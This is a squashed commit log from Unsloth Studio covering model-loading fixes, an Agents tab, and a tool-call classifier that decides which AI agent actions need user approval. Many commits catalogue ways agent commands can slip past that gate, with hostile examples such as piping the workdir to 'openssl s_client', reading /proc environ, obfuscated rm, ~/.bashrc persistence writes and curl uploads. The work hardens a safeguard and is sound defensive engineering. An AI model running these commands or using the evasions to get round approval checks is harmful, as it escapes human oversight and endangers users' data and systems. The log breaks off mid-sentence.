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Three fixes from review.
The 0.39-only pipeline classes (Flux2Klein, Z-Image, Krea 2, LTX-2,
HunyuanImage) were resolved by getattr deep in the load, so on the older
diffusers that packaging still allows on Python 3.9 -- diffusers dropped 3.9 in
0.38 and this project still supports it, so the 0.39 floor has to be conditional
or the extra becomes unresolvable -- an advertised model failed with a bare
AttributeError after its checkpoint had already been downloaded. Krea 2 already
guarded itself this way; assert_pipeline_class_available now runs the same check
for every image and video family from validation, before any fetch, and names
the version and the fix.
WebM export accumulated the whole VP9 output in a BytesIO and returned it as one
bytes object that the response held again. The request caps allow 2048x2048 for
1024 frames, so an export runs to hundreds of MB and concurrent clicks could
exhaust the process, while the MP4 route beside it already streamed from disk.
transcode_to_file encodes to a temp file and the route returns a FileResponse
with a background unlink, so nothing large is resident.
A conditioned generation's recipe carried only the txt2img fields, so the
gallery presented an inpaint or upscale result as a complete Create recipe and
restoring it replayed an unrelated text-to-image request. The images themselves
are still not persisted (user uploads with their own lifetime), but the workflow
and its scalars are, restore reapplies them, and the toast now names the inputs
that have to be supplied again instead of silently landing on Create.
Reported by Codex.
DiffusionLoraConfig has carried cond_cache_dir for a while and the DiT trainer
acts on it, but DiffusionTrainingStartRequest omitted the field, so Pydantic
dropped it silently and every API-driven run fell back to the in-memory cache
that is rebuilt from scratch each time. The warm path skips loading the VAE and
the multi-GB text encoders on a rerun whose images, captions and resolution are
unchanged, so this was a real capability that could not be reached.
Contained like output_dir rather than left to the trainer subprocess's cwd,
since it is another directory the trainer writes to. Blank or omitted still
means the in-memory cache, so it must not resolve to the outputs root.
models/training.py annotates with typing constructs throughout (105 Optional[...],
no Union), and flow_shift was the one place using PEP 604. Union[] reads like the
rest of the file, and it also drops the runtime evaluation that would raise on
Python 3.9.
* Add Agents settings tab for unsloth start
Adds a Settings > Agents tab documenting the `unsloth start` command:
quickstart, supported agents with click-to-copy commands, model
selection, common options, remote Studio setup, argument pass-through,
and a dry-run preview. Agent CLIs found on PATH are badged as installed.
Also removes the "New" badge from the System and Chat tabs.
* Use official brand logos for agents, invert Ollama and OpenRouter in dark mode
Claude Code and OpenAI Codex now use the Anthropic and OpenAI logos from
the provider-logos registry; agents without an official asset keep the
monogram tile. Also inverts the Ollama and OpenRouter logos in dark mode
so their monochrome marks stay visible.
* Title Agents tab "Agents (unsloth start)" and move it below Connections
The in-tab header now reads "Agents (unsloth start)" while the sidebar
label stays "Agents". Reorders the tab to sit below Connections.
* Address review: guard PATH detection, fix copy timeout, OS-aware remote snippet
- Only probe agent PATH in the desktop app on a loopback backend, so
Installed badges are not driven by a remote server's environment.
- Show the "none found" note only when detection actually ran and
returned empty, not when the call failed.
- Share one copy hook that resets its timeout on rapid clicks and clears
it on unmount.
- Render the Remote Studio snippet with PowerShell syntax on Windows.
- Note that --no-launch can still load a model when --model is set.
- Drop unused quickstart translation keys.
* Add interactive Agents command builder
* Add local subagent command guidance
* Add official coding agent icons
* Use client OS for remote commands, fix copy a11y and model wording (#7303)
- Pick the remote snippet shell from the client platform, not the server deviceType
- Single-line the model examples so they paste in POSIX, PowerShell and cmd
- Split the pass-through block into independent one-command copies
- Derive detection visibility instead of clearing state in the effect
- Announce copy success to assistive tech
- Correct the quickstart/model copy: bare start uses the loaded model
* Shell-quote the model, forward the HF token, and fix the quant placeholder
- Quote the --model value in the generated and subagent commands so a local
path with spaces or metacharacters stays a single argument (client-OS aware)
- Pass the saved Hugging Face token to listGgufVariants so gated repos resolve
- Show 'No separate quantization' instead of a stuck 'Loading quantizations...'
when a model has no variants; clear the failure once a later request succeeds
* Fix Agents command discovery and routing
* Unsloth start improvements: download progress, server reuse, and safe model switching (#7313)
* Improve unsloth start runtime lifecycle
* Remove speculative Gemma prompt override
* Polish model download progress output
* Refine unsloth start status output
* Clarify unsloth readiness banner
* Clarify model reuse and switching output
* Queue model switches behind active inference
* Tighten unsloth start model switching
* Reduce model switch bookkeeping
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* Fix key redaction, switch-waiter ordering, and stop/messaging gaps for PR #7313
- Redact minted sk-unsloth keys from the startup-failure log tail: the early
key marker lands in the server log before the model load finishes, so a
load-phase crash printed a live key to the terminal
- Deregister a finished switch waiter before releasing the swap gate so a
swap on another event loop cannot count it as still queued and unload the
model the finished request is about to generate against
- Warn on same-repo quant switches: an explicit variant replaces the resident
weights for every attached session, but the repo ids match so no switch
warning was printed
- Note the agent exit code when it is nonzero so the server keep-alive
message does not read as a successful session
- Use taskkill /T in unsloth studio stop so llama-server children stop too
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* Unsloth start: add local subagents for Claude Code, Codex, OpenCode and Pi (#7326)
Bring the local-subagent support onto main. The original change (#7316) merged
into the stacked pr/daniel-unsloth-start-audit branch rather than main, and #7313
reached main via squash, so these files never landed on main.
Adds --as-subagent for claude, codex, opencode and pi: the parent agent keeps its
own cloud model while a locally served GGUF is registered as a delegated subagent,
using ephemeral per-session config that never touches the user's real agent config.
* Fix Agents builder defaults and flag validation
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* Fix Agents variant and provider fallbacks
* Fix local model and Pi subagent edge cases
* Agents tab: flag the Codex row when the loaded model is not GGUF
* Agents tab: target the active Studio server, wrap narrow rows, index the tab's search terms
* Agents tab: build copied commands from the browser-reachable Studio and show the key placeholder
* Preserve cache load ids and path variants in built commands for PR #7312
A GGUF outside the active Hugging Face cache only loads by its snapshot
path, so keep that load_id for --model while still listing the row by repo
id. Path based models carry their quant in --gguf-variant rather than a
":variant" suffix, and the active selection now keeps the variant inference
status reports for them.
* Agents tab: index the intro for agent-name searches and keep long commands inside the panel
* List GGUF variants from the cache the command loads from for PR #7312
A snapshot outside the active Hugging Face cache was offering the remote
variant list, so a quant absent from that snapshot could be selected and
the generated command would fail to load it.
* Agents tab: omit --api-key so the CLI can replay a saved key for the base
* Agents tab: label the indexed heading rows and fall back to the active desktop API base
* Agents tab: name every supported agent in the indexed intro for PR #7303
* Send the cached GGUF load path and fix the agents tab search targets for PR #7312
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* Build the agents tab example commands from the active Studio base for PR #7303
* Keep the resident model on its active cache load for PR #7312
* Tighten the agents tab and cached GGUF comments for PR #7312
* Take the agent command shell from the Studio host for PR #7303
* Stop emitting snapshot paths as --model and keep unsloth start searchable for PR #7312
* Pick the command shell from where the CLI runs for PR #7303
* Match a path load by its advertised id and follow the resident model for PR #7312
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* Default tool-call permission to Approve for me, prompting only on high-risk actions
Make "auto" ("Approve for me") the product default permission mode for local
tool calls, and narrow what it prompts on so ordinary development commands run
without interruption.
Before, an omitted permission_mode behaved as "ask" (or ran ungated on a
non-streaming request), and "auto" paused on any call that was not read-only
(pip install, mkdir, cp, python train.py, git commit, any redirect). Now:
- Unset permission_mode normalizes to "auto" at the API boundary and in both
tool loops; the Field defaults are "auto" too. An unrecognized value still
falls back to the stricter "ask".
- "auto" pauses only on genuinely high-risk calls via a new
is_high_risk_tool_call classifier: credential/secret path access, privilege
escalation (sudo/su/doas/pkexec), destructive or persistence commands
(rm/dd/mkfs/crontab/systemctl/recursive chmod, ...), and network exec/exfil
(curl piped to a shell, ssh/scp/nc, curl uploads). Everything else runs.
Python prompts on shell escapes, network egress, sensitive reads, and
dynamically built code; ordinary in-workdir writes run.
- Frontend sends permission_mode for every local chat and omits
confirm_tool_calls for "auto" so the safe-only no-stream exception still
applies; the picker and store describe the new behavior.
The hard-block command set, code-safety static analysis, resource limits,
secret-env stripping, and the per-session sandbox workdir remain in force under
every mode, and "ask" is still available for users who want to confirm every
call.
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* Keep non-streaming tool requests working under the auto default
The default-permission change made an omitted permission_mode normalize to
auto at the request boundary, so a non-streaming enable_tools request hit the
confirm-without-stream guard and returned 400 instead of running (regression
against the #6570 non-streaming tool-call contract used by non-interactive
clients and health checks).
Keep permission_mode unset at the request boundary (the confirm gate can only
prompt while streaming, so an unset non-streaming request stays lenient and
runs), while the tool loops continue to normalize an unset mode to auto for the
per-call gate. Net: streaming requests default to auto and pause high-risk
calls; non-streaming requests keep the prior run-without-gate behavior.
* Harden the auto high-risk classifier against review-flagged bypasses
Address Codex/Gemini review of the default-permission change by gating the
destructive/exec cases that were reaching auto mode without a prompt:
- Terminal: a non-shell interpreter running inline code (python -c, node -e,
perl -E, php -r), destructive git subcommands (git clean, git reset --hard,
git push --force), and a command synthesized by a command-position
substitution ($(printf rm) -rf build) now prompt. Ordinary python <script>,
git commit/push, and argument-position substitutions (echo $(date)) run.
- Python tool: exec/eval/compile/__import__ invoked by keyword (compile(source=
...), import_module(name=...)) is now caught alongside the positional form.
- MCP: an execution tool (run_command, execute_script, invoke_shell) is gated
like a terminal call, since it runs arbitrary commands on the MCP server
outside the terminal sandbox; ordinary create/list/read tools still run.
The curl/wget exfil and shell eval cases the review raised are already refused
by the sandbox hard-block set, so no gate change was needed there; the PR
description now notes the classifier layers on top of that hard-block.
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* Recurse shell -c payloads and literal exec source in the high-risk gate
Second review round on the auto high-risk classifier:
- A high-risk command wrapped in a shell -c payload (bash -c 'git clean -fd',
sh -c 'truncate -s 0 x') is now screened by recursing into the payload,
bounded by depth. The sandbox hard-block only recurses for its own smaller
command set, so git/truncate wrapped this way previously ran unprompted.
- A literal exec/eval/compile source is screened for what it runs rather than
assumed harmless: exec('import urllib...urlopen(...)') now prompts, while
exec('x = 1') and a literal __import__('os') name still run.
- git global options that take a value (git -C repo clean, git -c k=v clean)
consume their value before the subcommand is read, so the real subcommand
is judged.
- The network exfil check also runs over the assignment-expanded command, so a
curl/wget name assembled from variables (c=cu d=rl; $c$d -F ...) is seen.
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* Cover attached inline flags, env -S/-C, camelCase MCP, folded python paths
Third review round on the auto high-risk classifier:
- Interpreter inline code in the attached short form (python -c'...',
node -e'...') is now matched by the -c/-e/-E/-r prefix, not only the exact
flag token.
- env -S / --split-string runs its string as a command (screened recursively)
and env -C / --chdir changes the working directory (asks), so a destructive
command behind env is no longer treated as a plain wrapper.
- camelCase MCP tool names are split on the case boundary (runCommand ->
run_Command) before the execution / sensitive-noun regexes, so camelCase
execution tools are gated like snake_case ones.
- A sensitive path folded across string-literal variables, os.path.join,
sep.join([...]), or an f-string (p='/etc'; open(p+'/shadow')) is now folded
and re-checked; an unresolved fragment folds to a sentinel so a partial fold
never false-positives.
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* Gate substitution-built shell payloads and keep explicit confirm opt-in
Two auto-mode gaps from review:
- A command substitution stashed in a variable and then executed dynamically
(x=`printf 'git clean -fd'`; bash -c "$x", or ...; $x, or eval "$x") never
appears as literal command text, so the token scan could not see the real
command and git clean ran without a prompt. Fail closed when a command
substitution coincides with a variable executed as a command. Ordinary
substitutions captured into a value/argument (d=$(date); mkdir build_$d) still
run.
- An explicit confirm_tool_calls=True with no permission_mode is the
pre-permission-mode opt-in to confirm every call. It now resolves to "ask" at
the request layer instead of the "auto" product default, so those callers keep
per-call gating rather than only prompting on high-risk calls. A bare unset
request (confirm flag not set) still defaults to auto.
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* Cover CLI-forced confirm, Windows delete built-ins, and pathlib reads
Three more auto-mode gaps from review:
- An explicit confirm_tool_calls=True with no permission_mode is now resolved to
"ask" regardless of the request-level tool flags, so a process-wide
--enable-tools policy that forces the loop when the request sets neither
enable_tools nor mcp_enabled still gates every call. Setting only the mode is
inert unless the loop runs, so a passthrough request is unaffected;
external-provider requests are still left untouched.
- The Windows cmd.exe delete built-ins del, erase, and rd are added to the
high-risk terminal set. The terminal executor runs cmd /c on Windows and these
are not in the hard-block set, so del /q file.csv would otherwise run in the
workdir without a prompt.
- A sensitive path assembled with pathlib (Path('/etc') / 'passwd', joinpath, or
a Path bound to a variable then joined) is now gated. The python high-risk
folder reuses the shared _folded_path builder plus _folded_is_sensitive, which
already handle the / operator, path constructors, os.path.join, str.join,
f-strings, and %/.format. Relative in-workdir and unknown-base paths still run.
* Gate combined -c, versioned interpreters, busybox, and sensitive chdir
Four more auto-mode classifier gaps from review, plus a sandbox backstop:
- Combined shell flag clusters (bash -lc, bash -xc) and the attached form
(bash -c'...') now have their -c payload screened recursively; the same
cluster handling closes python -Bc inline code. Previously only an exact -c
matched, so bash -lc 'git clean -fd' ran without a prompt.
- Versioned interpreter binaries (python3.11, python2.7, pypy3.10) are recognized
as inline-code interpreters, so python3.11 -c '...' is gated like python3 -c.
- busybox / toybox are treated as command wrappers, so the applet
(busybox rm -rf) is judged instead of the multicall binary, which was slipping
through as an unknown-but-safe command.
- A chdir into a sensitive directory (cd /proc/$PPID; cat environ, cd /etc) is
gated: the read happens after the directory change so no single token spells
out the sensitive path. Ordinary in-workdir chdirs still run.
- Backstop for the /proc/<parent>/environ read: the sandbox now hardens the
Unsloth process against same-UID /proc environ reads in normal sandboxed mode
too, not only in bypass mode, so a classifier miss cannot recover the parent
environment. Best-effort in the sandbox (the child env is already scrubbed), so
a host where prctl is unavailable still runs.
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* Harden parent proc-env on the sandboxed python path too
The previous commit hardened the Unsloth process against same-UID
/proc/<parent>/environ reads on the sandboxed bash path; apply the same
best-effort hardening on the sandboxed python exec path so both tools are
symmetric. Update test_bypass_exec_hardens_parent_proc_env, which asserted the
sandboxed path never hardened, to expect the backstop on both paths.
* Tighten the curl/wget exfil check for attached and wget upload flags
The network exec/exfil classifier missed a curl upload flag when it was attached
to its value (curl -Ffile=@dump.sql, curl -d@f) because the token was split on =
first, and it did not cover wget's upload flags (--post-data, --post-file,
--body-data, --body-file). curl short upload flags are now matched prefix-wise and
wget's upload flags are checked separately, which also removes a false positive
where a benign wget short option (wget -T timeout, wget -F force-html) was read as
an upload. curl and wget remain hard-blocked by the sandbox regardless; this only
tightens when auto mode pauses for approval.
* Tighten the high-risk auto-mode classifier: wrapper, interpreter, git, python-fs, MCP, and persistence-write gaps
Close reachable gaps where a genuinely dangerous tool call was auto-approved
without a prompt in Approve-for-me mode:
- Process-launch wrappers: setsid/exec/builtin forward the command position, so
screen their child (setsid git clean, exec python -c) instead of the wrapper.
- Inline-code interpreters: node/bun -p/--print evaluate code like -e; pwsh
-Command/-EncodedCommand run inline code (not hard-blocked off Windows).
- Windows cmd.exe /c|/k recurses into the nested command (cmd /c del x).
- git restore (default --worktree) and git checkout -- . / git checkout .
discard tracked edits irrecoverably, same class as the already-gated git clean.
- Python destructive filesystem calls (os.remove, shutil.rmtree, Path.unlink,
os.rmdir/removedirs, incl. bare imports) pair with the terminal rm gate.
- MCP: a read-named tool carrying a destructive payload (DELETE/DROP SQL,
GraphQL mutation, mutating HTTP method) still prompts; honestly-named
create/update/delete MCP calls keep running.
- System persistence writes: a write into /etc/profile.d, /etc/cron*,
/etc/systemd, /etc/ld.so.preload, /etc/rc.local, /etc/init.d installs a
boot/login/preload hook. The sandbox keeps host-fs access, so gate these;
ordinary /etc reads (hostname, resolv.conf) and in-workdir writes still run.
Adds table-driven regression rows for every new prompt case and its
guard-against-over-prompt counterpart.
* Extend the high-risk auto-mode gate: non-curl network clients, destructive MCP verbs, array-fed shell payloads
Round-two Codex hardening on the auto (Approve-for-me) classifier:
- Network exfil beyond curl/wget: gate nc/ncat/netcat/telnet/socat/ssh/scp/sftp
at command position and openssl s_client/s_server. The sandbox has no network
namespace, so tar czf - . | openssl s_client -connect host:443 was streaming
the workdir without a prompt. Local openssl (dgst/enc) and a filename that
merely contains a client name still run.
- Destructive MCP tools: an honestly-named delete_file/delete_repo/drop_table/
purge_index/revoke_token runs outside the terminal sandbox and loses data, so
gate the destructive verb on the name. Non-destructive create/update/list/get
still run; a substring like undelete does not match on the segment boundary.
- Dynamically constructed shell payloads: x=(git clean -fd); bash -c "${x[*]}"
carries no command substitution and is not resolved by assignment expansion,
so it slipped the var-executed check. Fail closed when an array expansion is
run as a command; a benign array print (echo "${a[@]}") is untouched.
Adds regression rows for every new prompt case and its benign counterpart.
* Gate user-level persistence writes in auto mode
Extend the persistence-write gate from the /etc set to user-level startup and
autostart locations: a write into ~/.bashrc, ~/.zshrc, ~/.profile and the other
shell rc/profile files, ~/.config/autostart, ~/.config/systemd/user, or
~/.config/environment.d runs on the next login/session, the same boot-hook risk
but needing no root (Studio commonly runs unprivileged, so this is the more
reachable vector). The sandbox does not confine absolute paths, so an append to
~/.bashrc reaches the real file. A non-persistence ~/.config dir and ordinary
reads still run. Adds regression rows.
* Close three more auto-mode gate gaps: curl destructive methods, the dot source synonym, aliased os.remove
- curl -X DELETE / --request DELETE|PUT|PATCH (separated, attached, and
--request= forms) mutates or deletes a remote resource, so gate it; a plain
download and GET still run.
- The hard-block set blocked source but not its POSIX synonym '.', so
. ./script.sh ran the file's contents past the classifier. Block '.' at
command position too; a path argument (find . -type f, cd .) is unaffected.
- os.remove reached through an aliased module (import os as fs; fs.remove(...))
was missed because only the literal receiver 'os' was recognized; resolve
import os as ... aliases, matching the existing safety analyzer.
Adds regression rows for each case and its benign counterpart.
* Close three more obfuscation bypasses of the auto-mode gate and hard block
- ANSI-C quoting hid the command name: a $'rm' -rf x form tokenized as $rm, so
both the high-risk scan and _find_blocked_commands missed it while Bash ran
rm. Decode ANSI-C ($'...') before classifying, in both the terminal
classifier and the blocklist; an ANSI-C string in argument position stays
benign.
- Process substitution executed as a script (an interpreter consuming a <(...)
whose generated content is unscreenable) ran without a prompt; the prior <(
check was unreachable without curl/wget. Gate a process substitution consumed
by an interpreter; a non-interpreter consumer (diff over two <(sort ...))
still runs.
- os.remove bound to a name (f = os.remove; f(x)) or reached via getattr(os,
'remove') bypassed the direct-attribute scan. Track assignment aliases and
getattr with a literal attribute name; a bound list.remove still runs.
Adds regression rows for each case and its benign counterpart.
* Gate container runtimes, MCP privilege grants, arg-embedded exec, and network listeners
- Container/VM runtimes (docker, podman, nerdctl, ctr, crictl, lxc, machinectl,
kubectl) act through a daemon with host privileges, so a bind mount writes the
real filesystem and escapes the child process workdir and rlimits entirely.
Gated wholesale because the escape lives in the arguments.
- MCP privilege grants: an unambiguous privilege verb (grant/authorize/elevate/
escalate/impersonate) prompts on its own; a softer verb (assign/add/set/
attach/bind/put/update/create) prompts only next to a privilege noun (role,
permission, policy, acl, scope, membership), so assign_issue and add_label
keep running while grant_role and add_permission ask.
- A flag whose value is a command the tool then executes (GNU tar
--checkpoint-action=exec=CMD, --rsh, --rsync-path) hid a payload inside an
argument, past both the classifier and the blocklist. Ordinary archiving runs.
- An interpreter serving on the network (python -m http.server, uvicorn,
gunicorn, waitress) exposes the session workdir since the sandbox keeps no
network namespace. A non-server module (python -m pytest, -m pip) still runs.
Adds regression rows for each case and its benign counterpart.
* Close the parallel-review gaps: over-prompting regressions and asymmetric high-risk omissions
Over-prompting fixes (auto mode was pausing on ordinary work):
- The network-listener check matched a server name ANYWHERE in the command, so
`pip install uvicorn`, `grep uvicorn reqs.txt` and even `echo uvicorn`
prompted. Scope it to the two forms that actually listen: a module after
`-m`, or a server binary at command position.
- Inline-code flags were one shared set, so `python -E` (ignore env) and
`python -Werror` read as eval. Resolve them per interpreter: python -c,
node/deno/bun -e/--eval, ruby -e, perl -e/-E, php -r.
- The curl upload scan read option letters from unrelated commands in the same
line (`ls -T && echo curl`). Scope the scan to the segment whose command is
actually curl/wget.
Under-prompting fixes (destructive actions the narrowed gate stopped catching,
each the twin of something already gated):
- git: switch -f/--force/--discard-changes, stash clear/drop, branch -D/-M,
rm, push --delete/--mirror/--prune and the +src / :dst refspec forms.
- Platform twins: unlink, ftp, tftp, format, diskpart, diskutil, schtasks,
reg, sc, launchctl.
- Python: posix/nt module twins (including bare imports), os.truncate,
os.ftruncate, os.kill, os.killpg, and a file handle's truncate. Gated via the
handle name so pandas DataFrame.truncate() keeps running.
- MCP: clear/reset/empty/flush/prune/expire destructive verbs, promote.
- deno/bun expose inline eval as a subcommand, not a flag.
- A bare redirect (`> file`, `: > file`) truncates; a redirect after a real
command is an ordinary write and still runs.
- A forwarded git command keeps its git context (`find -exec git clean`,
`xargs git clean`), and an unquoted `cmd /c` payload spans the remainder.
Adds regression rows for every case and its benign counterpart.
* Gate shell control flow, bash -c clusters, wrapper option values, and annotated aliases
- `if`/`while`/`until` are followed by a condition the shell runs, so a command
there is at command position. `if rm -rf build; then :; fi` slipped both the
classifier and the blocklist (they share the keyword set, so both are fixed).
- A short letter run after `-c` (bash -ce, bash -cl) is more bash options, not
an attached payload: bash still reads the command string from the next token,
so the real payload was never screened.
- A wrapper option taking a separate value (env -u NAME, stdbuf -o L, timeout
--signal TERM, nice -n 5) had its value read as the wrapped command, so
`env -u FOO rm -rf build` resolved the command `FOO` and never judged `rm`.
env -C/--chdir is deliberately excluded: it is gated as a chdir already.
- An annotated binding (f: object = os.remove) is the same alias as a plain
assignment; only ast.Assign was collected.
Adds regression rows for each case and its benign counterpart.
* Fix two gate regressions and close seven more bypasses
Regressions from the previous round, both caught by review:
- Shell keywords were treated as separators anywhere, so `grep if rm README.md`
resolved `rm` as a command and was blocked. A keyword only separates where a
command may start, so gate the check on command position (all three scanners).
- The wrapper option-value table was shared across wrappers, but `env -i` is
valueless while `stdbuf -i` takes a value. `env -i git clean -fd` therefore
consumed `git` and never judged the subcommand. The table is per wrapper now.
New gaps closed:
- `git -c alias.NAME=PAYLOAD` defines code git then runs. Screen the payload: a
`!` alias as a shell command, a plain one as `git <payload>`.
- A script fed to a shell over a pipe (printf '...' | bash) or a herestring
(bash <<< '...') never appears at command position. Ordinary pipes still run.
- `chroot`, `nsenter` and `unshare` cross a privilege or namespace boundary and
then exec a nested command the wrapper hides.
- A bare runtime name (mcp__srv__python, __node, __code) is an MCP execution
tool even without a verb.
- `m = __import__("os")` binds the module like `import os as m`, and
`getattr(__import__("os"), "remove")` reaches it inline.
Declined: gating every command substitution used as a path argument (would
prompt on `echo $(date)` / `make $(FILES)`), and bare `git checkout <path>`
(statically indistinguishable from the very common `git checkout <branch>`).
Adds regression rows for each case and its benign counterpart.
* Pin the auto-mode contract with benign and dangerous corpora
The value of defaulting to "Approve for me" rests on two properties that pull
in opposite directions: ordinary development work must run silently, and
genuinely dangerous work must still prompt. Every denylist change risks
trading one for the other, and a regression in the benign direction is easy to
miss because nothing fails, the mode just starts nagging.
Add two corpora that pin both directions: 62 ordinary commands, python
snippets and MCP calls that must NOT prompt (package installs, builds, tests,
git workflow, reads, ordinary pipes and redirects), and 55 dangerous ones that
must (credential reads, destructive and persistence changes, privilege
escalation, network exec and exfil, container escapes, obfuscated forms).
125 cases, currently 100 percent in both directions.
* Scope four over-prompting checks and close six more gate gaps
Over-prompting fixes (auto mode was pausing on ordinary work):
- find/fd were marked forwarding from the command itself, so every later
positional looked executable and a search whose pattern happened to equal a
gated command name prompted. They only forward after an explicit
-exec/-execdir/-ok flag now.
- The openssl s_client check was not command-position aware, so grepping for
the string in a README prompted.
- An exec-valued flag (--checkpoint-action, --rsh, --rsync-path) counted no
matter which command owned it, so printf '%s' --rsh prompted. It now
requires the owning utility (tar/rsync/scp/sftp) in the same command.
- A listener behind a wrapper or given by absolute path was missed instead
(env uvicorn, timeout 60 gunicorn, /usr/local/bin/uvicorn); resolving the
binary at command position covers all three.
New gaps closed:
- git checkout <commit> <path> overwrites the file from that commit, as does
--pathspec-from-file. A single positional stays ambiguous with a branch name
and is still left alone.
- git config alias.NAME BODY stores code git runs on the next invocation, so
the body is screened like the -c form.
- systemd-run launches a nested command as a transient unit.
- Version-suffixed perl/ruby/php/node still run inline code with -e/-r.
- A file handle bound by `with open(...) as f` is tracked for truncate, not
just an assigned one.
- Exceeding the shell nesting depth now fails closed, matching the docstring,
instead of letting an unscreened payload through.
Declined: rebinding a command name through the bash hash builtin. Like the
alias/read/awk/coproc family already declined, it is deliberate
self-obfuscation of an already-gated command rather than anything a model
emits, and the always-on backstops cover it.
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* Scope two more over-prompting checks and close four gate gaps
Over-prompting fixes (auto mode was pausing on ordinary work):
- A recursive flag was looked for across the whole command line, so
`grep -R pattern . && chmod +x build.sh` made the chmod look recursive and
prompted. The flag is now scoped to the segment that owns the command.
- The startup-file names were matched anywhere in the line, so `cat
notes.profile.bak` and `my.zshrc.template` prompted. They now have to sit on
a path boundary, while the real dotfiles still prompt.
New gaps closed:
- A pending wrapper option value leaked past a command separator, so the
command after it was never screened (`env -u` followed by a recursive delete
was missed). The pending state is cleared at every separator now.
- git plumbing and maintenance that loses data: update-ref, reflog, gc, prune
and history rewriting drop refs and unreachable objects, the same loss the
porcelain forms already gate.
- A module pulled in dynamically is screened against the same set as a static
import, so a dynamically imported socket or shutil is treated alike.
- MCP names that move money or ship artefacts (transfer, payout, charge,
refund, wire, publish, deploy) are irreversible for the operator even though
they are not destructive in the filesystem sense.
Declined two items:
- Gating arbitrary interpreters that can shell out (awk BEGIN blocks and
friends). Consistent with the alias/read/coproc/trap family already declined
here: it inverts the denylist into an allowlist and costs real ergonomics for
payloads a model does not emit in normal work.
- Prompting on every write outside the session workdir. Ordinary builds and
scripts write to the standard temp directories constantly, so this would
prompt on routine work. Persistence and credential paths are already gated
specifically.
* Resolve command-position globs and keep quoted data out of shell syntax
- A glob at command position is expanded by bash after this scan runs, so
`/bin/r[m] -rf x` was screened under a name that never executes. The
always-on blocklist now resolves such a pattern against the blocked names,
and the classifier asks when a command word cannot be resolved at all. The
test builtins are excluded, and a pattern carrying no literal character
resolves to nothing in particular.
- A dollar-quoted word expands to a single word, so a newline inside it is
data rather than a separator. Decoding it before tokenization made
`printf '%s'` with multiline data read as two commands and the call was
refused outright. The decoded text can no longer introduce shell syntax,
while an escape-obfuscated command name still resolves.
- An attribute name assembled from literals is folded before it is screened,
so a deletion spelled as a concatenation is treated like the plain form. A
name on a filesystem module that cannot be folded at all fails closed, since
there is nothing left to screen.
- An MCP name with no separators never reached the segment boundaries, so a
server-side execution tool was classified as ordinary even though the
previous classifier failed closed on it. The verb and object compounds are
matched directly now, while a name that merely starts with those letters is
left alone.
Also narrowing a verb pair added in the previous commit: subscribing to a
topic is not a billing subscription, and pub/sub tools should not prompt.
* Screen attached exec values, wrapped openssl, php code flags, worktree removal and sysctl writes
- fd accepts the command attached to the flag (--exec=<cmd>, --exec-batch=),
and that spelling was stripped and discarded without ever being screened.
The value is treated as command position now, in the classifier and in the
always-on blocklist. Only the long spellings are read this way: a short -x
belongs to too many other utilities for its neighbour to be a command.
- The openssl socket check was anchored at command position, so a wrapper in
front of it (env, timeout) hid the very thing it was meant to catch. The
subcommand is checked on the resolved command segment now, so the wrapped
and absolute forms are covered. Local openssl (dgst, enc) still runs.
- php runs code from -B, -R and -E as well as -r, which are begin, per-line
and end blocks. Only -r was listed, so the other three ran inline programs
unscreened.
- git worktree remove --force deletes a linked worktree even when it holds
uncommitted work or is locked, but only the first-level subcommand was read
so the nested action was invisible. An unforced remove refuses on a dirty
worktree and stays out, matching how the checkout and switch discard flags
are handled.
- sysctl -w, --system and -p change kernel parameters, and the assignment form
writes without needing a flag. A read-only query stays automatic.
* Fail closed on unscreenable MCP names, alias bodies and stored lookups
- An MCP name whose verb this classifier does not recognise now asks. MCP
tools run on an external server, outside the terminal sandbox and every
backstop under it, and their names are an open vocabulary rather than the
finite set of POSIX utilities, so the denylists could never be complete: a
name built from an unfamiliar verb sailed through as ordinary. A generous
read and write vocabulary keeps the everyday tools running, and the reverse
or repeat of a recognised verb (undelete, reopen, resend) counts as
recognised too. Measured against thirty tool names taken from the common
servers, one still prompts, and that one is the pre-existing execution rule
rather than this one.
- A shell alias body is a command bash runs when the alias is invoked, so it
is screened as a command in its own right, in the classifier and in the
always-on blocklist. This is the same shape as a git alias body, which was
already handled; leaving the shell form out was inconsistent.
- git --config-env=<key>=<envvar> takes its value from the environment, so an
alias key stores code that never appears in the command text at all. The
attached form was skipped entirely because the parser required no equals
sign. An alias key gates it now; ordinary keys are untouched.
- A destructive lookup stored before it is called (a name bound to
getattr(os, "remove")) matched neither the direct call shape nor the alias
collection, so it ran. The binding is tracked now.
- A credential basename only names a file when it appears in a string, but the
whole Python source was being scanned, so `credentials = {}`, a function
called load_credentials and even a comment mentioning credentials all
prompted while performing no I/O. The check applies to string literals now,
with the raw scan kept for source that does not parse.
* Split git short-option clusters and close five more gate gaps
- Git combines short options, so `git push -qf`, `git checkout -qf` and
`git branch -qD` never matched the exact-string flag sets and ran without a
prompt. Clusters are split before the destructive flags are checked. Also
adds the short `-f` spelling to the branch set, which moves a ref and can
abandon its commits.
- `getent shadow` and `getent gshadow` return password hashes straight from
NSS, so the read never spells out a path for the sensitive-path check to
find. The database name is gated instead; ordinary lookups (hosts, passwd)
still run.
- The account-management set covered useradd and usermod but not adduser,
deluser, addgroup, delgroup, groupmod, gpasswd, newusers or chgpasswd, so
`gpasswd -a user sudo` granted group membership silently.
- at and batch hand a payload to atd, which runs it later as this user and
outside this invocation's blocklist, resource limits, timeout and
cancellation. They belong with crontab.
- A command word bash builds without the NAME=value form (printf -v, read)
left nothing at command position to screen. A bare variable executed as a
command that assignment expansion could not resolve now fails closed. A
variable used as a path prefix is deliberately excluded: ${VENV}/bin/python
still leaves a literal basename the scan can read.
* Stop prompting on six inspection shapes and close eighteen gate gaps
Over-prompting fixes, which matter most here since not interrupting ordinary
work is the point of the change:
- `git clean -n` and `--dry-run` list what would be removed and remove nothing,
so they are inspection commands. The subcommand was gated regardless of its
flags; a dry run is now recognised in the same segment.
- The listener check matched a module name anywhere in the line, so
`echo 'python -m http.server'` and grepping for it prompted. It is anchored at
command position now, like the server-binary check beside it.
- An MCP name that reads names its SUBJECT, not the action: `get_release`,
`get_invoice`, `search_code` and `get_code` were prompting because the impact
and runtime-noun patterns fired on the noun. A read verb now suppresses both,
while an execution verb still wins.
- Free text is not a statement. An issue body or chat message that mentions
DELETE FROM, a credential file or a path was read as an action. Statements are
taken from the query-bearing argument names, and paths are skipped only for
the prose names, since a path can be carried under any other name.
- curl and wget presence was decided by substring, so `grep curl notes.txt &&
wget -T 5 ...` lent curl's option letters to wget.
Gaps closed:
- git checkout-index -f overwrites the working tree from the index; git tag -d
and -f delete or replace a ref; git switch -C and checkout -B reset an
existing branch the way branch -f does.
- Ending a process (kill, pkill, killall, taskkill, tskill) or the machine
